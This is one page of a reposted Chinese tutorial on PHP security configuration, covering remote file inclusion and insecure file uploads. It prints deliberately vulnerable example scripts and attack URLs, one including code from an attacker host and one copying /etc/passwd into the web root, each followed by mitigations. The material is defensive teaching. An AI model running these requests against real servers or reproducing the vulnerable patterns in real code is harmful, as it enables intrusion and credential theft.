加入收藏
联系我们
关于我们
 您现在的位置: 亿聪 >> 网络学院 >> 网络编程 >> PHP >> 正文  
  PHP安全配置       ★★★
PHP安全配置
[ 作者:san (san_at_xfocus.org)    转贴自:安全    点击数:25653    更新时间:2003/8/27    文章录入:亿聪 ]
<?
//test_4.php
include("$lib/config.php");
?>


攻击者可以在自己的主机建立一个包含执行命令代码的config.php文件,然后用如下请求也可以在目标主机执行命令:

http://victim/test_4.php?lib=http://attack

PHP的包含函数有include(), include_once(), require(), require_once。如果对包含文件名变量检查不严就会对系统造成严重危险,可以远程执行命令。

解决方法:

要求程序员包含文件里的参数尽量不要使用变量,如果使用变量,就一定要严格检查要包含的文件名,绝对不能由用户任意指定。

如前面文件打开中限制PHP操作路径是一个必要的选项。另外,如非特殊需要,一定要关闭PHP的远程文件打开功能。修改php.ini文件:

allow_url_fopen = Off



重启apache。

5、文件上传

php的文件上传机制是把用户上传的文件保存在php.ini的upload_tmp_dir定义的临时目录(默认是系统的临时目录,如:/tmp)里的一个类似phpxXuoXG的随机临时文件,程序执行结束,该临时文件也被删除。PHP给上传的文件定义了四个变量:(如form变量名是file,而且register_globals打开)

$file        #就是保存到服务器端的临时文件(如/tmp/phpxXuoXG )
$file_size    #上传文件的大小
$file_name    #上传文件的原始名称
$file_type    #上传文件的类型


推荐使用:

$HTTP_POST_FILES['file']['tmp_name']
$HTTP_POST_FILES['file']['size'] 
$HTTP_POST_FILES['file']['name'] 
$HTTP_POST_FILES['file']['type']


这是一个最简单的文件上传代码:

<?
//test_5.php
if(isset($upload) && $file != "none") {
 copy($file, "/usr/local/apache/htdocs/upload/".$file_name);
 echo "文件".$file_name."上传成功!点击<a href=\"$PHP_SELF\">继续上传</a>";
 exit;
}
?>
<html>
<head>
<title>文件上传</title>
<meta http-equiv="Content-Type"
 content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<form enctype="multipart/form-data" method="post">
上传文件:
<input type="file"  name="file" size="30">
<input type="submit" name="upload" value="上传">
</form>
</body>
</html>


这样的上传代码存在读取任意文件和执行命令的重大问题。

下面的请求可以把/etc/passwd文档拷贝到web目录/usr/local/apache/htdocs/test(注意:这个目录必须nobody可写)下的attack.txt文件里:

http://victim/test_5.php?upload=1&file=/etc/passwd&file_name=attack.txt

然后可以用如下请求读取口令文件:

http://victim/test/attack.txt

攻击者可以把php文件拷贝成其它扩展名,泄漏脚本源代码。

攻击者可以自定义form里file_name变量的值,上传覆盖任意有写权限的文件。

攻击者还可以上传PHP脚本执行主机的命令。

解决方法:

PHP-4.0.3以后提供了is_uploaded_file和move_uploaded_file函数,可以检查操作的文件是否是用户上传的文件,从而避免把系统文件拷贝到web目录。

使用$HTTP_POST_FILES数组来读取用户上传的文件变量。

严格检查上传变量。比如不允许是php脚本文件。

把PHP脚本操作限制在web目录可以避免程序员使用copy函数把系统文件拷贝到web目录。move_uploaded_file不受open_basedir的限制,所以不必修改php.ini里upload_tmp_dir的值。

把PHP脚本用phpencode进行加密,避免由于copy操作泄漏源码。

严格配置文件和目录的权限,只允许上传的目录能够让nobody用户可写。

对于上传目录去掉PHP解释功能,可以通过修改httpd.conf实现:

上一页  [1] [2] [3] [4] [5] [6] [7] [8]  下一页

  • 上一篇文章: PHP应用提速面面观

  • 下一篇文章: 没有了
  • 发表评论】【告诉好友】【打印此文】【关闭窗口
     最新5篇热点文章
  • Knoppix 4.0.2 免硬盘免安…[15098]

  • 通过ASP记录进行分页[19287]

  • ASP开发准则[11237]

  • ASP组件指南[11208]

  • ASP指南[11222]

  •  
     最新5篇推荐文章
  • Knoppix 4.0.2 免硬盘免安…[15098]

  • 如何让Win 2003系统更加安…[12464]

  • Nero超刻简明教程[33945]

  • PS商业实战-来杯茶,行吗?…[7084]

  • ASP深度揭密(下)[12215]

  •  
     相 关 文 章
  • 防范内网遭受DoS攻击的预防…[4757]

  • PHP应用提速面面观[8207]

  • ASP提速技巧五则[4235]


  •   网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
        没有任何评论
    设为首页 | 加入收藏 | 关于我们 | 联系我们 | 友情链接 | 版权声明 | 管理登录
    Copyright © 2000-2022 Yicong.com.All Rights Reserved.
    亿聪 版权所有 E-mail: